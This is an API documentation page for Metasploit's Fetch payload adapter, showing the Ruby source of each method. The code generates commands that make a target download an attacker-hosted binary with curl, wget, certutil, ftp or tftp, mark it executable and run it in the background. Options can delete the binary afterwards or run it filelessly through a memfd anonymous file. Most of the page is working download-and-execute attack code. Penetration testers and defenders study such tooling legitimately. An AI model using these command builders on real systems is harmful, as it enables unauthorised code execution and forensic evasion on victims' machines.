Module: Msf::Payload::Adapter::Fetch

Included in:

HTTP, Https, SMB, TFTP

Defined in:

lib/msf/core/payload/adapter/fetch.rb

Defined Under Namespace

Modules: HTTP, Https, LinuxOptions, SMB, TFTP, WindowsOptions

Instance Method Summary

• #_check_tftp_file ⇒ Object
• #_check_tftp_port ⇒ Object
• #_determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s) ⇒ Object

  copied from github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb.

• #_execute_add(get_file_cmd) ⇒ Object
• #_execute_nix(get_file_cmd) ⇒ Object
• #_execute_win(get_file_cmd) ⇒ Object
• #_generate_certutil_command ⇒ Object
• #_generate_curl_command ⇒ Object
• #_generate_fileless(get_file_cmd) ⇒ Object

  The idea behind fileless execution are anonymous files.

• #_generate_ftp_command ⇒ Object
• #_generate_tftp_command ⇒ Object
• #_generate_tnftp_command ⇒ Object
• #_generate_wget_command ⇒ Object
• #_remote_destination ⇒ Object
• #_remote_destination_nix ⇒ Object
• #_remote_destination_win ⇒ Object
• #default_srvuri ⇒ Object

  If no fetch URL is provided, we generate one based off the underlying payload data This is because if we use a randomly-generated URI, the URI generated by venom and Framework will not match.

• #download_uri ⇒ Object
• #fetch_bindhost ⇒ Object
• #fetch_bindnetloc ⇒ Object
• #fetch_bindport ⇒ Object
• #generate(opts = {}) ⇒ Object
• #generate_fetch_commands ⇒ Object
• #generate_payload_uuid(conf = {}) ⇒ Object
• #generate_stage(opts = {}) ⇒ Object
• #handle_connection(conn, opts = {}) ⇒ Object
• #initialize(*args) ⇒ Object
• #linux? ⇒ Boolean
• #srvhost ⇒ Object
• #srvnetloc ⇒ Object
• #srvport ⇒ Object
• #srvuri ⇒ Object
• #windows? ⇒ Boolean

Instance Method Details

#_check_tftp_file ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 169

def _check_tftp_file
  # Older Linux tftp clients do not support saving the file under a different name
  unless datastore['FETCH_WRITABLE_DIR'].blank? && datastore['FETCH_FILENAME'].blank?
    print_error('The Linux TFTP client does not support saving a file under a different name than the URI.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_WRITABLE_DIR and FETCH_FILENAME must be blank when using the tftp client')
  end
end

#_check_tftp_port ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 161

def _check_tftp_port
  # Most tftp clients do not have configurable ports
  if datastore['FETCH_SRVPORT'] != 69 && datastore['FetchListenerBindPort'].blank?
    print_error('The TFTP client can only connect to port 69; to start the server on a different port use FetchListenerBindPort and redirect the connection.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVPORT must be set to 69 when using the tftp client')
  end
end

#_determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s) ⇒ Object

copied from github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb

# File 'lib/msf/core/payload/adapter/fetch.rb', line 178

def _determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s)
  comm = nil

  case srv_comm
  when 'local'
    comm = ::Rex::Socket::Comm::Local
  when /\A-?[0-9]+\Z/
    comm = framework.sessions.get(srv_comm.to_i)
    raise("Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
    raise("Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
  when nil, ''
    unless ip.nil?
      comm = Rex::Socket::SwitchBoard.best_comm(ip)
    end
  else
    raise("SocketServer Comm '#{srv_comm}' is invalid")
  end

  comm || ::Rex::Socket::Comm::Local
end

#_execute_add(get_file_cmd) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 199

def _execute_add(get_file_cmd)
  return _execute_win(get_file_cmd) if windows?

  return _execute_nix(get_file_cmd)
end

#_execute_nix(get_file_cmd) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 211

def _execute_nix(get_file_cmd)
  return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS']

  cmds = get_file_cmd
  cmds << ";chmod +x #{_remote_destination_nix}"
  cmds << ";#{_remote_destination_nix}&"
  cmds << "sleep #{rand(3..7)};rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
  cmds
end

#_execute_win(get_file_cmd) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 205

def _execute_win(get_file_cmd)
  cmds = " & start /B #{_remote_destination_win}"
  cmds << " & del #{_remote_destination_win}" if datastore['FETCH_DELETE']
  get_file_cmd << cmds
end

#_generate_certutil_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 221

def _generate_certutil_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "certutil -urlcache -f http://#{download_uri} #{_remote_destination}"
  when 'HTTPS'
    # I don't think there is a way to disable cert check in certutil....
    print_error('CERTUTIL binary does not support insecure mode')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using CERTUTIL')
    get_file_cmd = "certutil -urlcache -f https://#{download_uri} #{_remote_destination}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_curl_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 262

def _generate_curl_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "curl -so #{_remote_destination} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "curl -sko #{_remote_destination} https://#{download_uri}"
  when 'TFTP'
    get_file_cmd = "curl -so #{_remote_destination} tftp://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_fileless(get_file_cmd) ⇒ Object

The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains “memfd”) with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor

# File 'lib/msf/core/payload/adapter/fetch.rb', line 237

def _generate_fileless(get_file_cmd)
  # get list of all $USER's processes
  cmd = 'FOUND=0'
  cmd << ";for i in $(ps -u $USER | awk '{print $1}')"
  # already found anonymous file where we can write
  cmd << '; do if [ $FOUND -eq 0 ]'

  # look for every symbolic link with write rwx permissions
  # if found one, try to download payload into the anonymous file
  # and execute it
  cmd << '; then for f in $(find /proc/$i/fd -type l -perm u=rwx 2>/dev/null)'
  cmd << '; do if [ $(ls -al $f | grep -o "memfd" >/dev/null; echo $?) -eq "0" ]'
  cmd << "; then if $(#{get_file_cmd} >/dev/null)"
  cmd << '; then $f'
  cmd << '; FOUND=1'
  cmd << '; break'
  cmd << '; fi'
  cmd << '; fi'
  cmd << '; done'
  cmd << '; fi'
  cmd << '; done'

  cmd
end

#_generate_ftp_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 276

def _generate_ftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_tftp_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 290

def _generate_tftp_command
  _check_tftp_port
  case fetch_protocol
  when 'TFTP'
    if windows?
      fetch_command = _execute_win("tftp -i #{srvhost} GET #{srvuri} #{_remote_destination}")
    else
      _check_tftp_file
      if datastore['FETCH_FILELESS'] && linux?
        return _generate_fileless("(echo binary ; echo get #{srvuri} $f ) | tftp #{srvhost}")
      else
        fetch_command = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
      end
    end
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  fetch_command
end

#_generate_tnftp_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 310

def _generate_tnftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_wget_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 324

def _generate_wget_command
  case fetch_protocol
  when 'HTTPS'
    get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end

  _execute_add(get_file_cmd)
end

#_remote_destination ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 337

def _remote_destination
  return _remote_destination_win if windows?

  return _remote_destination_nix
end

#_remote_destination_nix ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 343

def _remote_destination_nix
  return @remote_destination_nix unless @remote_destination_nix.nil?

  if datastore['FETCH_FILELESS']
    @remote_destination_nix = '$f'
    return @remote_destination_nix
  end
  writable_dir = datastore['FETCH_WRITABLE_DIR']
  writable_dir = '.' if writable_dir.blank?
  writable_dir += '/' unless writable_dir[-1] == '/'
  payload_filename = datastore['FETCH_FILENAME']
  payload_filename = srvuri if payload_filename.blank?
  payload_path = writable_dir + payload_filename
  @remote_destination_nix = payload_path
  @remote_destination_nix
end

#_remote_destination_win ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 360

def _remote_destination_win
  return @remote_destination_win unless @remote_destination_win.nil?

  writable_dir = datastore['FETCH_WRITABLE_DIR']
  writable_dir += '\\' unless writable_dir.blank? || writable_dir[-1] == '\\'
  payload_filename = datastore['FETCH_FILENAME']
  payload_filename = srvuri if payload_filename.blank?
  payload_path = writable_dir + payload_filename
  payload_path += '.exe' unless payload_path[-4..] == '.exe'
  @remote_destination_win = payload_path
  @remote_destination_win
end

#default_srvuri ⇒ Object

If no fetch URL is provided, we generate one based off the underlying payload data This is because if we use a randomly-generated URI, the URI generated by venom and Framework will not match. This way, we can build a payload in venom and a listener in Framework, and if the underlying payload type/host/port are the same, the URI will be, too.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 35

def default_srvuri
  # If we're in framework, payload is in datastore; msfvenom has it in refname
  payload_name = datastore['payload'] ||= refname
  decoded_uri = payload_name.dup
  # there may be no transport, so leave the connection string off if that's the case
  netloc = ''
  if module_info['ConnectionType'].upcase == 'REVERSE' || module_info['ConnectionType'].upcase == 'TUNNEL'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['LPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['LPORT']}"
      else
        netloc = "#{netloc}:#{datastore['LPORT']}"
      end
    end
  elsif module_info['ConnectionType'].upcase == 'BIND'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['RPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['RPORT']}"
      else
        netloc = "#{netloc}:#{datastore['RPORT']}"
      end
    end
  end
  decoded_uri << ";#{netloc}"
  Base64.urlsafe_encode64(OpenSSL::Digest::MD5.new(decoded_uri).digest, padding: false)
end

#download_uri ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 64

def download_uri
  "#{srvnetloc}/#{srvuri}"
end

#fetch_bindhost ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 68

def fetch_bindhost
  datastore['FetchListenerBindAddress'].blank? ? srvhost : datastore['FetchListenerBindAddress']
end

#fetch_bindnetloc ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 76

def fetch_bindnetloc
  Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
end

#fetch_bindport ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 72

def fetch_bindport
  datastore['FetchListenerBindPort'].blank? ? srvport : datastore['FetchListenerBindPort']
end

#generate(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 80

def generate(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  opts[:code] = super
  @srvexe = generate_payload_exe(opts)
  cmd = generate_fetch_commands
  vprint_status("Command to run on remote host: #{cmd}")
  cmd
end

#generate_fetch_commands ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 89

def generate_fetch_commands
  # TODO: Make a check method that determines if we support a platform/server/command combination
  #
  case datastore['FETCH_COMMAND'].upcase
  when 'FTP'
    return _generate_ftp_command
  when 'TNFTP'
    return _generate_tnftp_command
  when 'WGET'
    return _generate_wget_command
  when 'CURL'
    return _generate_curl_command
  when 'TFTP'
    return _generate_tftp_command
  when 'CERTUTIL'
    return _generate_certutil_command
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
end

#generate_payload_uuid(conf = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 115

def generate_payload_uuid(conf = {})
  conf[:arch] ||= module_info['AdaptedArch']
  conf[:platform] ||= module_info['AdaptedPlatform']
  super
end

#generate_stage(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 110

def generate_stage(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#handle_connection(conn, opts = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 121

def handle_connection(conn, opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#initialize(*args) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 2

def initialize(*args)
  super
  register_options(
    [
      Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
      Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
      # FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
      Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
      Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
    ]
  )
  register_advanced_options(
    [
      Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
      Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
      Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
    ]
  )
  @delete_resource = true
  @fetch_service = nil
  @myresources = []
  @srvexe = ''
  @remote_destination_win = nil
  @remote_destination_nix = nil
  @windows = nil
end

#linux? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/msf/core/payload/adapter/fetch.rb', line 154

def linux?
  return @linux unless @linux.nil?

  @linux = platform.platforms.first == Msf::Module::Platform::Linux
  @linux
end

#srvhost ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 126

def srvhost
  host = datastore['FETCH_SRVHOST']
  host = datastore['LHOST'] if host.blank?
  host = '127.127.127.127' if host.blank?
  host
end

#srvnetloc ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 133

def srvnetloc
  Rex::Socket.to_authority(srvhost, srvport)
end

#srvport ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 137

def srvport
  datastore['FETCH_SRVPORT']
end

#srvuri ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 141

def srvuri
  return datastore['FETCH_URIPATH'] unless datastore['FETCH_URIPATH'].blank?

  default_srvuri
end

#windows? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/msf/core/payload/adapter/fetch.rb', line 147

def windows?
  return @windows unless @windows.nil?

  @windows = platform.platforms.first == Msf::Module::Platform::Windows
  @windows
end